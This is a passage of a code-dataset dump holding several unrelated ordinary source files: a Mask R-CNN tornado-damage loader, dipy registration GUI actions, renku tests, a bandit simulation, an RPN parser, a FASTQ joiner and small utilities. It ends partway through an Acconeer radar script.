+{"seq_id":"367997870","text":"\"\"\"\ntornado.py\ntornado dataset package\n\nZhiang Chen, Nov 2018\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport skimage.draw\nimport pickle\nimport argparse\nimport matplotlib.pyplot as plt\n\nfrom mrcnn import visualize\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\nROOT_DIR = os.path.abspath(\"../../\")\nsys.path.append(ROOT_DIR) # To find local version of the library\n\n# Path to trained weights file\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\n\n# Directory to save logs and model checkpoints, if not provided\n# through the command line argument --logs\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n############################################################\n# Dataset config\n############################################################\nclass TornadoConfig(Config):\n NAME = \"tornado\"\n GPU_COUNT = 1 # cannot create model when setting gpu count as 2\n \n IMAGES_PER_GPU = 1\n NUM_CLASSES = 1 + 2 # Background + non-damaged + damaged\n IMAGE_MIN_DIM = 800\n IMAGE_MAX_DIM = 1024\n \n RPN_ANCHOR_SCALES = (16, 64, 128, 256, 512)\n # IMAGE_CHANNEL = 1 # wrong, the input will be automatically converted to 3 channels (if greyscale, rgb will be repeated)\n \n STEPS_PER_EPOCH = 100\n DETECTION_MIN_CONFIDENCE = 0.9\n \n \n MAX_GT_INSTANCES = 100\n \n DETECTION_MAX_INSTANCES = 100\n \n TRAIN_ROIS_PER_IMAGE = 500\n \n############################################################\n# Dataset\n############################################################\nclass TornadoDataset(utils.Dataset):\n \n def load_tornado(self, datadir, subset):\n self.add_class(\"tornado\", 1, \"ndr\")\n self.add_class(\"tornado\", 2, \"dr\")\n \n assert subset in [\"train\", \"val\"]\n dataset_dir = os.path.join(datadir, subset)\n \n files = os.listdir(dataset_dir)\n \n image_id = 0\n for file in files:\n if '.jpg' in file:\n image_path = os.path.join(dataset_dir, file)\n assert os.path.isfile(image_path)\n \n annotation_path = os.path.join(dataset_dir, file.split('.')[0]+'.npy')\n assert os.path.isfile(annotation_path)\n \n #image = skimage.io.imread(image_path)\n height, width = 800, 800\n \n self.add_image(\n \"tornado\",\n image_id=image_id,\n path=image_path,\n width=width, \n height=height,\n annotation_path=annotation_path)\n \n image_id += 1\n \n \n def load_mask(self, image_id):\n info = self.image_info[image_id]\n if info[\"source\"] != \"tornado\":\n return super(self.__class__, self).load_mask(image_id)\n \n mask = np.load(info[\"annotation_path\"])\n \n if len(mask.shape) == 2:\n h,w = mask.shape\n mask_ = mask.reshape((h,w,1)).astype(np.bool)\n return mask_, np.zeros(1).astype('int32')\n \n else:\n h,w,c = mask.shape\n mask_ = np.zeros(mask.shape, dtype='uint8')\n mask_ = np.logical_or(mask, mask_)\n classes = []\n for i in range(c):\n if 50 < mask[:,:,i].max() < 180:\n classes.append(1)\n elif 200 < mask[:,:,i].max() < 260:\n classes.append(2)\n else:\n classes.append(0)\n classes = np.asarray(classes, dtype=np.int32)\n \n return mask_, classes\n\n def image_reference(self, image_id):\n info = self.image_info[image_id]\n if info[\"source\"] == \"tornado\":\n return info[\"path\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n \n def display_mask(self, image_id):\n masks, ids = self.load_mask(image_id)\n mask = masks.max(2)\n plt.imshow(mask)\n plt.show()\n \n \nif __name__ == '__main__':\n config = TornadoConfig()\n config.display()\n dataset = TornadoDataset()\n 
dataset.load_tornado('../../dataset/tornado', 'train')\n m, cls = dataset.load_mask(0)\n print(m[0,:,:].max())\n print(cls)\n print(dataset.image_reference(0))","sub_path":"samples/tornado/tornadoo.py","file_name":"tornadoo.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603355642","text":"from dbdicom.wrappers import dipy\nfrom wezel.gui import Action, Menu\n\n\ndef _if_a_series_is_selected(app):\n return app.nr_selected('Series') != 0\n\ndef _if_a_database_is_open(app):\n return app.database() is not None\n\ndef _never(app):\n return False\n\n\ndef median_otsu(app):\n\n # Get user input\n cancel, f = app.dialog.input(\n {\"label\":\"Median Radius\", \"type\":\"integer\", \"value\": 2, 'minimum':1},\n {\"label\":\"Numpass\", \"type\":\"integer\", \"value\": 1, 'minimum':1},\n title = 'Select Thresholding settings')\n if cancel: \n return\n\n # Filter series\n series = app.selected('Series')\n for sery in series:\n mask_series, mask = dipy.median_otsu(\n sery, \n median_radius=f[0]['value'], \n numpass=f[1]['value'],\n )\n mask_series.remove()\n app.display(mask)\n app.refresh()\n\n\ndef _invert_deformation_field(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Deformation field\", \"type\":\"select record\", \"options\": series, 'default': sel},\n {\"label\":\"Maximum number of iterations\", \"type\":\"integer\", \"value\": 10, 'minimum':1},\n {\"label\":\"Tolerance\", \"type\":\"float\", \"value\":0.1, 'minimum':0.001},\n title = \"Invert deformation field\")\n if cancel:\n return\n deform_inv = dipy.invert_deformation_field(f[0], max_iter=f[1]['value'], tolerance=f[2]['value'])\n app.display(deform_inv)\n app.refresh()\n\n\ndef warp(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Series to warp\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Deformation field\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Interpolate? 
\", \"type\":\"dropdownlist\", \"list\": ['Yes', 'No'], 'value':0},\n title = \"Warp series with deformation field..\")\n if cancel:\n return\n warped = dipy.warp(f[0], f[1], \n interpolate = True if f[2]==0 else False)\n app.display(warped)\n app.refresh()\n\n\ndef _align_center_of_mass_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving image\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed image\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"Align center of mass (3D)\")\n if cancel:\n return\n moved = dipy.align_center_of_mass_3d(f[0], f[1])\n app.display(moved)\n app.refresh()\n\n\ndef coregister_deformable_2d_to_2d(app):\n series = app.database().series()\n sel = app.selected('Series')\n metric = [\"Cross-Correlation\", 'Expectation-Maximization', 'Sum of Squared Differences']\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Metric\", \"type\":\"dropdownlist\", \"list\": metric, 'value':0},\n title = \"Please select 2D to 2D coregistration settings\")\n if cancel:\n return\n coregistered, deformation = dipy.coregister_2d_to_2d(f[0], f[1],\n transformation = 'Symmetric Diffeomorphic',\n metric = metric[f[2][\"value\"]],\n )\n app.display(coregistered)\n app.display(deformation)\n app.refresh()\n\n\ndef _coregister_translation_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with translation\")\n if cancel:\n return\n coregistered = dipy.coregister_translation_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef _coregister_rigid_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with translation & rotation\")\n if cancel:\n return\n coregistered = dipy.coregister_rigid_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef _coregister_affine_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n title = \"3D coregistration with affine transformation\")\n if cancel:\n return\n coregistered = dipy.coregister_affine_3d(f[0],f[1])\n app.display(coregistered)\n app.refresh()\n\n\ndef coregister_deformable_3d_to_3d(app):\n series = app.database().series()\n sel = app.selected('Series')\n metric = [\"Cross-Correlation\", 'Expectation-Maximization', 'Sum of Squared Differences']\n cancel, f = app.dialog.input(\n {\"label\":\"Moving series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Fixed series\", \"type\":\"select record\", \"options\":series, 'default':sel},\n {\"label\":\"Metric\", \"type\":\"dropdownlist\", 
\"list\": metric, 'value':0},\n title = \"Please select 3D to 3D coregistration settings\")\n if cancel:\n return\n coregistered, deformation = dipy.coregister_3d_to_3d(f[0], f[1],\n transformation = 'Symmetric Diffeomorphic',\n metric = metric[f[2][\"value\"]])\n app.display(coregistered)\n app.display(deformation)\n app.refresh()\n\n\n# Segmentation\naction_median_otsu = Action('Median Otsu segmentation', on_clicked=median_otsu, is_clickable=_if_a_series_is_selected)\n\n# Coregistration\naction_align_center_of_mass_3d = Action('Align center of mass (3D)', on_clicked=_align_center_of_mass_3d, is_clickable=_if_a_database_is_open)\naction_coregister_translation_3d = Action('Coregister (Translation - 3D)', on_clicked=_coregister_translation_3d, is_clickable=_if_a_database_is_open)\naction_align_moments_of_inertia_2d = Action('Align moments of inertia (2D)', on_clicked=_never, is_clickable=_never)\naction_align_moments_of_inertia_3d = Action('Align moments of inertia (3D)', on_clicked=_never, is_clickable=_never)\naction_coregister_rigid_2d = Action('Coregister (Rigid - 2D)', on_clicked=_never, is_clickable=_never)\naction_coregister_rigid_3d = Action('Coregister (Rigid - 3D)', on_clicked=_coregister_rigid_3d, is_clickable=_if_a_database_is_open)\naction_coregister_affine_2d = Action('Coregister (Affine - 2D)', on_clicked=_never, is_clickable=_never)\naction_coregister_affine_3d = Action('Coregister (Affine - 3D)', on_clicked=_coregister_affine_3d, is_clickable=_if_a_database_is_open)\naction_coregister_deformable_2d_to_2d = Action('Coregister (Deformable - 2D)', on_clicked=coregister_deformable_2d_to_2d, is_clickable=_if_a_database_is_open)\naction_coregister_deformable_3d_to_3d = Action('Coregister (Deformable - 3D)', on_clicked=coregister_deformable_3d_to_3d, is_clickable=_if_a_database_is_open)\naction_warp = Action('Warp', on_clicked=warp, is_clickable=_if_a_database_is_open)\naction_invert_deformation = Action('Invert deformation field', on_clicked=_invert_deformation_field, is_clickable=_if_a_database_is_open)\n\n\nmenu_all = Menu('dipy')\nmenu_all.add(action_median_otsu)\nmenu_all.add_separator()\nmenu_all.add(action_align_center_of_mass_3d)\nmenu_all.add(action_coregister_translation_3d)\nmenu_all.add_separator()\nmenu_all.add(action_align_moments_of_inertia_2d)\nmenu_all.add(action_align_moments_of_inertia_3d)\nmenu_all.add(action_coregister_rigid_2d)\nmenu_all.add(action_coregister_rigid_3d)\nmenu_all.add_separator()\nmenu_all.add(action_coregister_affine_2d)\nmenu_all.add(action_coregister_affine_3d)\nmenu_all.add_separator()\nmenu_all.add(action_coregister_deformable_2d_to_2d)\nmenu_all.add(action_coregister_deformable_3d_to_3d)\nmenu_all.add_separator()\nmenu_all.add(action_warp)\nmenu_all.add(action_invert_deformation)\n\n\n\nmenu_coreg = Menu('Coregister 
(dipy)')\nmenu_coreg.add(action_align_center_of_mass_3d)\nmenu_coreg.add(action_coregister_translation_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_align_moments_of_inertia_2d)\nmenu_coreg.add(action_align_moments_of_inertia_3d)\nmenu_coreg.add(action_coregister_rigid_2d)\nmenu_coreg.add(action_coregister_rigid_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_coregister_affine_2d)\nmenu_coreg.add(action_coregister_affine_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_coregister_deformable_2d_to_2d)\nmenu_coreg.add(action_coregister_deformable_3d_to_3d)\nmenu_coreg.add_separator()\nmenu_coreg.add(action_warp)\nmenu_coreg.add(action_invert_deformation)\n\n\n\n","sub_path":"src/wezel/plugins/dipy.py","file_name":"dipy.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552191679","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019-2020 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Repository tests.\"\"\"\n\nimport tempfile\nfrom pathlib import Path\n\nfrom renku import LocalClient\nfrom renku.core.commands.dataset import create_dataset\n\n\ndef test_latest_version(project):\n \"\"\"Test returning the latest version of `SoftwareAgent`.\"\"\"\n from renku import __version__\n\n create_dataset().build().execute(\"ds1\", title=\"\", description=\"\", creators=[])\n\n agent_version = LocalClient(project).latest_agent\n assert __version__ == agent_version\n\n\ndef test_latest_version_user_commits(project):\n \"\"\"Test retrieval of `SoftwareAgent` with latest non-renku command.\"\"\"\n from git import Repo\n\n from renku import __version__\n\n create_dataset().build().execute(\"ds1\", title=\"\", description=\"\", creators=[])\n\n myfile = Path(\"myfile\")\n myfile.write_text(\"123\")\n\n repo = Repo(project)\n repo.index.add([str(myfile)])\n repo.index.commit(\"added myfile\")\n\n agent_version = LocalClient(project).latest_agent\n assert __version__ == agent_version\n\n\ndef test_init_repository(local_client):\n \"\"\"Test initializing an empty repository.\"\"\"\n local_client.init_repository()\n assert (local_client.path / \".git\").exists()\n assert (local_client.path / \".git\" / \"HEAD\").exists()\n assert not (local_client.path / \".renku\").exists()\n\n\ndef test_import_from_template(local_client):\n \"\"\"Test importing data from template.\"\"\"\n output_file = \"metadata.yml\"\n local_client.init_repository()\n with tempfile.TemporaryDirectory() as tempdir:\n template_path = Path(tempdir)\n fake_template_file = template_path / output_file\n with fake_template_file.open(\"w\") as dest:\n dest.writelines(\n [\n \"name: {{ name }}\",\n \"description: {{ description }}\",\n \"created: {{ date_created }}\",\n \"updated: {{ date_updated }}\",\n ]\n )\n metadata = {\n \"name\": \"name\",\n 
\"description\": \"description\",\n \"date_created\": \"now\",\n \"date_updated\": \"now\",\n \"__template_source__\": \"renku\",\n \"__template_ref__\": \"master\",\n \"__template_id__\": \"python-minimal\",\n \"__namespace__\": \"\",\n \"__repository__\": \"\",\n \"__project_slug__\": \"\",\n }\n local_client.import_from_template(template_path, metadata)\n compiled_file = local_client.path / output_file\n compiled_content = compiled_file.read_text()\n expected_content = \"name: name\" \"description: description\" \"created: now\" \"updated: now\"\n assert expected_content == compiled_content\n","sub_path":"tests/core/management/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586586716","text":"from django.urls import path,include\r\nfrom . import views\r\napp_name='medical'\r\n\r\nurlpatterns = [\r\n # path('',views.predict,name='predict'),\r\n # path('',views.index,name='index'),\r\n path('create',views.create,name='create'),\r\n path('image_ocr',views.image_ocr,name='image_ocr'),\r\n path('camimg',views.camimg,name='camimg'),\r\n]","sub_path":"medical/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104987092","text":"from utils import *\nfrom tests import *\nfrom config import *\nfrom controller import *\nfrom solvers import *\nfrom matplotlib.pyplot import figure\n\n\ndebug = True\nconfig = [ucb_config, epsilon_decay_config,\n epsilon_greedy_config, tit_for_tat_config]\n# config = [ucb_config]\nstochastic_policy = \"./Test Files/Prisoners Transition.csv\"\nget_regret = True\nnum_timesteps = 10000\n\nreward_save_path = (\"./Figures/Stochastic Agents/UCB/b_Stochastic_UCB_%s80.png\" \n %(\"regret\" if get_regret else \"reward\"))\n\naction_save_path = \"./Figures/Stochastic Agents/UCB/b_Stochastic_UCB_Actions80.png\"\n\n\ndef testUtils():\n prisoners_test()\n\ndef runFromConfig(config, get_regret = get_regret, stochastic_policy = None):\n config.reward_dict = n_agent_rewards(config.reward_matrix_filepath)\n #this can be made cleaner just don't want to right now sorry\n \n config.car_agent = config.car_policy(num_actions = config.num_actions,\n eps = config.eps)\n config.agents = []\n for agent in config.agent_policies:\n config.agents.append(agent(num_actions = config.num_actions))\n\n bandit = run_multi_armed_bandit(reward_dict = config.reward_dict,\n car_policy = config.car_agent,\n agent_policies = config.agents,\n max_timesteps = num_timesteps,\n get_regret = get_regret,\n stochastic_policy = stochastic_policy)\n\n\n\n return_val = bandit.run_simulation()\n if isinstance(config.car_agent, ucb1):\n pass #was using for debuggin\n # print bandit.car_policy.Q\n return return_val\n\n\n\ndef runRepeatedSimulation(configs, transition_policy):\n legend = []\n lines = []\n action_dict = {}\n color_dict = {}\n figure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\n\n for config in configs:\n overall_car_regret, overall_agent_regret = [], []\n actions = []\n for _ in range(config.num_sims):\n car_regret, agent_regret, car_actions = runFromConfig(config, \n stochastic_policy = transition_policy)\n \n overall_car_regret.append(copy.copy(car_regret))\n overall_agent_regret.append(copy.copy(agent_regret))\n\n # with open (\"actions.txt\", \"a\") as f:\n # f.write(\"NEW SECTION\\n\")\n 
actions.append(np.array(car_actions).copy())\n\n action_dict[config.name] = np.array(actions).copy()\n\n lines.append(plot_car_regret(overall_car_regret, \n config.color, config.color_,\n config.name, \n axis_label = \"Regret\" if get_regret else\n \"Reward\"))\n legend.append(config.name)\n color_dict[config.name] = (config.color, config.color_)\n\n plt.legend(lines, legend)\n plt.savefig(reward_save_path)\n\n plt.clf()\n\n plot_actions(action_dict, color_dict = color_dict)\n plt.savefig(action_save_path)\n\n\n\n\n\n\ndef main():\n if debug:\n testUtils()\n\n if stochastic_policy is not None:\n transition_policy = load_stochastic_transitions(stochastic_policy, config[0].num_actions)\n\n runRepeatedSimulation(config, transition_policy)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595705386","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nbill = float(input('How much was the bill '))\nperc=float(input('what percentage you want, 10, 12 or 15 '))\nnumber=float(input('How many people '))\n\ntip = (bill/number)*(1+(perc/100))\nprint(\"{:.2f}\".format(round(tip,2)))\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"45625563","text":"import pytest\nimport numpy as np\nfrom aos.solver import Solver, SensitivitySolver\n\ndef test_abstract_solver():\n with pytest.raises(TypeError):\n Solver()\n\ndef test_sensitivity_solver_nominal():\n solver = SensitivitySolver()\n y0 = np.zeros(len(solver.y0) + 1)\n # hack because Noll (1976) indexing starts from j=1\n y0[1:] = solver.y0\n xest = solver.solve(y0)\n ref = np.zeros(20)\n\n np.testing.assert_allclose(xest.array, ref)\n","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"331082554","text":"import my_token\n\n\ndef get_rpn(i: int, tokens_type):\n res = []\n stack_idx = []\n error = \"\"\n while tokens_type[i] != my_token.SEMI:\n if tokens_type[i] == my_token.INT_NUMBER or tokens_type[i] == my_token.DOUBLE_NUMBER or tokens_type[i] in [my_token.FALSE, my_token.TRUE]:\n res.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.IDENTIFIER:\n res.append(i)\n if tokens_type[i + 1] == my_token.LPAR:\n i += 1\n while tokens_type[i] != my_token.RPAR:\n i += 1\n # if tokens_type[i] == my_token.LPAR:\n # i += 1\n i += 1\n continue\n elif my_token.is_operator(tokens_type[i]):\n if tokens_type[i] == my_token.OPERATOR_POWER: # оператор возведения в степень правоассоциативна\n if len(stack_idx) == 0:\n stack_idx.append(i)\n else:\n while my_token.get_priority(tokens_type[i]) > my_token.get_priority(tokens_type[stack_idx[-1]]):\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n stack_idx.append(i)\n else:\n if len(stack_idx) == 
0:\n stack_idx.append(i)\n else:\n while (tokens_type[stack_idx[-1]] != my_token.LPAR) and \\\n (my_token.get_priority(tokens_type[i]) >= my_token.get_priority(tokens_type[stack_idx[-1]])):\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n stack_idx.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.LPAR:\n stack_idx.append(i)\n i += 1\n continue\n elif tokens_type[i] == my_token.RPAR:\n # if len(stack_idx) != 0:\n while tokens_type[stack_idx[-1]] != my_token.LPAR:\n res.append(stack_idx.pop())\n if len(stack_idx) == 0:\n break\n # else:\n # stack_idx.append(i)\n if tokens_type[stack_idx[-1]] == my_token.LPAR:\n stack_idx.pop()\n else:\n error = \"В выражжении неправельно расставлены скобки\"\n i += 1\n continue\n else:\n break\n if len(stack_idx) != 0:\n while len(stack_idx) != 0:\n res.append(stack_idx.pop())\n return i, res, error\n\n\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"455970034","text":"import random\n\n\ndef main():\n while True:\n greetings = ['hi', 'HI', 'Hi']\n questionsoffeelings = ['How are you?', 'How are you doing?', 'How are you feeling?']\n answersforfeelings = ['Good, yourself?', 'Shitty. :(']\n\n userInput = input(\">>> \")\n if userInput in greetings:\n print(\"Hello\")\n elif userInput in questionsoffeelings:\n print(random.choice(answersforfeelings))\n else:\n print(\"I do not understand you.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"JoeExp/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"349010180","text":"#! 
/usr/bin/env python3\n\nimport argparse\nimport os\nimport random\nimport math\n\n# number of reads taken in a single run\nREADS_IN_GROUP=10\n\nallowed_modes = [\n\t\t\t\"single-end\",\n\t\t\t\"paired-end-bwa\",\n\t\t\t\"paired-end-bfast\",\n\t\t]\n\nclass Mixer:\n\tdef __init__(self,mode,input_files,output_prefix):\n\t\tself.mode=mode\n\t\tself.input_files=input_files\n\t\tself.output_prefix=output_prefix\n\t\tself.rng=random.Random()\n\t\tself.rng.seed(1)\n\n\t\tself.i_files=[open(fn) for fn in input_files]\n\t\tself.i_files_sizes=[os.path.getsize(fn) for fn in input_files]\n\t\tself.i_files_proc=[int((100.0*x)/sum(self.i_files_sizes)) for x in self.i_files_sizes]\n\t\tself.i_files_weighted=[]\n\t\tfor i in range(len(self.i_files)):\n\t\t\tself.i_files_weighted.extend(self.i_files_proc[i]*[self.i_files[i]])\n\n\t\tread_id_length_est=math.ceil(\n\t\t\t\t\tmath.log(\n\t\t\t\t\t\tsum(self.i_files_sizes)/20,\n\t\t\t\t\t\t16,\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\tif args.m==\"single-end\":\n\t\t\tself.output=Output(fn_1=\"{}.fq\".format(output_prefix),reads_in_tuple=1,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=1\n\t\telif args.m==\"paired-end-bwa\":\n\t\t\tself.output=Output(fn_1=\"{}.1.fq\".format(output_prefix),fn_2=\"{}.2.fq\".format(output_prefix),reads_in_tuple=2,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=2\n\t\telif args.m==\"paired-end-bfast\":\n\t\t\tself.output=Output(fn_1=\"{}.fq\".format(output_prefix),reads_in_tuple=2,read_id_length=read_id_length_est)\n\t\t\tself._reads_in_tuple=2\n\t\telse:\n\t\t\traise ValueError(\"Unknown mode '{}'\".format(args.m))\n\n\tdef run(self):\n\t\twhile len(self.i_files_weighted)>0:\n\t\t\tfile_id=self.rng.randint(0,len(self.i_files_weighted)-1)\n\t\t\tfor i in range(READS_IN_GROUP*self._reads_in_tuple):\n\t\t\t\tif self.i_files_weighted[file_id].closed:\n\t\t\t\t\tdel self.i_files_weighted[file_id]\n\t\t\t\t\tbreak\n\n\t\t\t\tln1=self.i_files_weighted[file_id].readline()\n\t\t\t\tln2=self.i_files_weighted[file_id].readline()\n\t\t\t\tln3=self.i_files_weighted[file_id].readline()\n\t\t\t\tln4=self.i_files_weighted[file_id].readline()\n\n\t\t\t\tif not ln1:\n\t\t\t\t\tself.i_files_weighted[file_id].close()\n\t\t\t\t\tdel self.i_files_weighted[file_id]\n\t\t\t\t\tbreak\n\t\t\t\tself.output.save_read(ln1,ln2,ln3,ln4)\n\n\nclass Output:\n\tdef __init__(self,reads_in_tuple,fn_1,fn_2=None,read_id_length=6):\n\t\tself.reads_in_tuple=reads_in_tuple\n\t\tself.read_id_length=read_id_length\n\t\tself.fs=[open(fn_1,\"w+\")]\n\t\tif fn_2 is not None:\n\t\t\tself.fs.append(open(fn_2,\"w+\"))\n\t\tself.read_tuple_counter=0\n\n\tdef __del__(self):\n\t\tfor f in self.fs:\n\t\t\tf.close()\n\n\tdef save_read(self,ln1,ln2,ln3,ln4):\n\t\t[ln1,ln2,ln3,ln4]=[ln1.strip(),ln2.strip(),ln3.strip(),ln4.strip()]\n\n\t\tln1_parts=ln1.split(\"__\")\n\t\tln1_parts[1]=\"{:x}\".format(self.read_tuple_counter).zfill(self.read_id_length)\n\t\tln1=\"__\".join(ln1_parts)\n\t\n\t\tif self.reads_in_tuple==1:\n\t\t\tfile_id=0\n\t\t\tif ln1[-2]==\"/\":\n\t\t\t\traise ValueError(\"Wrong read name '{}'. Single end read should not contain '/'.\".format(ln1[1:]))\n\t\t\tself.read_tuple_counter+=1\n\t\n\t\telse:\n\t\t\tif ln1[-2]!=\"/\":\n\t\t\t\traise ValueError(\"Wrong read name '{}'. 
A read with two ends should contain '/'.\".format(ln1[1:]))\n\t\t\tif len(self.fs)==1:\n\t\t\t\tln1=ln1[:-2]\n\t\t\t\tfile_id=0\n\t\t\t\tself.read_tuple_counter+=1\n\t\t\telse:\n\t\t\t\tif ln1[-1]==\"1\":\n\t\t\t\t\tfile_id=0\n\t\t\t\telif ln1[-1]==\"2\":\n\t\t\t\t\tfile_id=1\n\t\t\t\t\tself.read_tuple_counter+=1\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Wrong read name '{}'.\".format(ln1[1:]))\n\n\t\tself.fs[file_id].write(\"\".join([ln1,os.linesep,ln2,os.linesep,ln3,os.linesep,ln4,os.linesep]))\n\n\nparser = argparse.ArgumentParser(\n\t\t\tdescription=\"Join FASTQ files with reads in RNF format.\",\n\t\t\tepilog=\"Source FASTQ files should satisfy the following conditions:\"\n\t\t\t\t\t\" 1) Each file contains only reads corresponding to one genome (with the same genome id).\"\n\t\t\t\t\t\" 2) All files contain reads of the same type (single-end / paired-end).\"\n\t\t\t\t\t\" 3) Reads with more reads per tuple (e.g., paired-end) have '/1', etc. in suffix (for identification of nb of read).\"\n\t\t)\n\nparser.add_argument(\n\t\t'-i',\n\t\trequired=True,\n\t\tmetavar='inp',\n\t\tnargs='+',\n\t\thelp='input FASTQ files',\n\t)\n\nparser.add_argument(\n\t\t'-m',\n\t\trequired=True,\n\t\tmetavar='mode',\n\t\tchoices=allowed_modes,\n\t\t#type=lambda x: is_valid_mode(parser,x),\n\t\thelp='mode for joining files (single-end / paired-end-bwa / paired-end-bfast)',\n\t)\n\n\nparser.add_argument(\n\t\t'-o',\n\t\tmetavar='out',\n\t\trequired=True,\n\t\thelp='output prefix',\n\t)\n\nargs = parser.parse_args()\n\noutpref=args.o\ninp_fastqs=args.i\n\nmixer=Mixer(\n\t\tmode=args.m,\n\t\tinput_files=args.i,\n\t\toutput_prefix=args.o,\n\t)\nmixer.run()\n\n","sub_path":"bin/rnf-join-fq.py","file_name":"rnf-join-fq.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"307831184","text":"import warnings\nfrom enum import Enum\n\nimport numpy as np\nimport pyqtgraph as pg\nfrom scipy.signal.windows import hann\n\nfrom PyQt5 import QtCore\n\nimport acconeer.exptool as et\n\nimport csv # For simple DB\n\nHALF_WAVELENGTH = 2.445e-3 # m\nHISTORY_LENGTH = 2.0 # s\nEST_VEL_HISTORY_LENGTH = HISTORY_LENGTH # s\nSD_HISTORY_LENGTH = HISTORY_LENGTH # s\nNUM_SAVED_SEQUENCES = 100\nSEQUENCE_TIMEOUT_LENGTH = 0.5 # s\n\n# Byt till mph från /s (ty i golf används mph)\ndef main():\n args = et.utils.ExampleArgumentParser(num_sens=1).parse_args()\n et.utils.config_logging(args)\n\n port = args.serial_port or et.utils.autodetect_serial_port()\n client = et.UARTClient(port)\n\n sensor_config = 